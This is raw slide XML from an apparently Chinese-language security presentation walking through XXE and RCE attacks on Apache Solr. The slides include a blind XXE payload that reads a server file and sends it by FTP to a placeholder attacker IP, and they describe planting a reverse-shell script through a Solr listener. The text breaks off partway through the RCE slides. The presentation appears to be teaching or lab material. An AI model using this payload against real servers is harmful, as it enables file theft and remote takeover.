            <a:off x="7810251" y="2271947"/>
            <a:ext cx="3356610" cy="1731010"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{510D1F76-3FF9-4B4A-8405-BAA979FAE344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1405924" y="4942123"/>
            <a:ext cx="6467475" cy="1743075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20591104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86949A2-8CC9-4E9E-890D-4C316CB6AADE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{D67FB534-14ED-48DA-894B-48C3AB7BEE60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2135186"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击端监听的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>端口成功收到访问请求，这说明该版本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Solr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>漏洞，由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>是同版本一起存在的漏洞，这也说明该版本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Solr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>也存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>漏洞。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>查看过代码，可以知道该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>漏洞属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Blind XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，所以我们需要建立带外数据通道，利用外部实体中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>发出访问，从而跟攻击者的服务器发生联系。构造的特殊查询语句如下：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{6369FF12-7BCA-4AFA-9324-E1DEE547AABF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7798075" y="303211"/>
            <a:ext cx="3619500" cy="1831975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{DBC16882-884A-4A44-A53C-2F51AF536F70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6612006" y="4662487"/>
            <a:ext cx="5143500" cy="2028825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31948020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80024A0-20B9-499B-9327-6DEDCB8BD04B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{F211A90A-F49B-42F7-A1DE-AF7E48AEC2F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>在攻击端开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务，在服务器根目录下放置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>xxe.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>文件，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>xxe.xml</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>文件的内容如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ENTITY % file SYSTEM "file:///tmp/test.txt "&gt; //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>file://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>可以读取服务器端的任意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ENTITY % int "&lt;!ENTITY &amp;#37; send SYSTEM 'ftp://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP:8000/%file;'&gt;"&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>进行传输时，特殊字符可能会导致传输失败，所以选择了使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>进行文件传输</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%int;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%send;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7181201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29D849D-DA48-49E8-A7E7-C705A633F50B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="227495"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{D4771E77-0531-4A10-8BD4-0E1D94F3D80F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141411" y="1488558"/>
            <a:ext cx="9905999" cy="3759221"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击端为了能够接收到服务器端传过来的文件，需要建立临时的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务器，在本次攻击中，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ruby</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>编写了简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务器，处理回传的文件。在命令行中开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务器。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>在浏览器中输入构造的特殊查询语句（需要经过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>编码），即可在开启了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务的命令行窗口中看到文件中的内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>test.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>文件内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Capture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Flag</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{59E6B65B-1D25-4B59-A81B-958907ACCFCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1436041" y="2663908"/>
            <a:ext cx="5924854" cy="1041454"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25915772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91ED023-42B1-4026-AF64-1B0650006690}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{D32B54F3-5B33-4C44-935C-3C91506339F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击端回显内容：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{8382D4E3-91B6-4187-B5FB-6DDCC3189F73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="3027094"/>
            <a:ext cx="5562886" cy="2394073"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39650352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2B90758-7F8C-48CE-8C00-CD913CC77898}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{024F940C-BBCB-42B3-83B6-A2FB2A8A59A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>add-listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>新建一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>listenner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，如果该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>已经存在，则可使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>update-listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>更新。该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的作用，是在服务器端的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>文件夹下创建一个能够引发反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3AC9BBD6-6F7A-49AA-BD88-14E28791EA47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303750" y="3732526"/>
            <a:ext cx="9581322" cy="2211074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15589181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A43A05C-E9FB-4DB2-8086-D2B678A27513}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
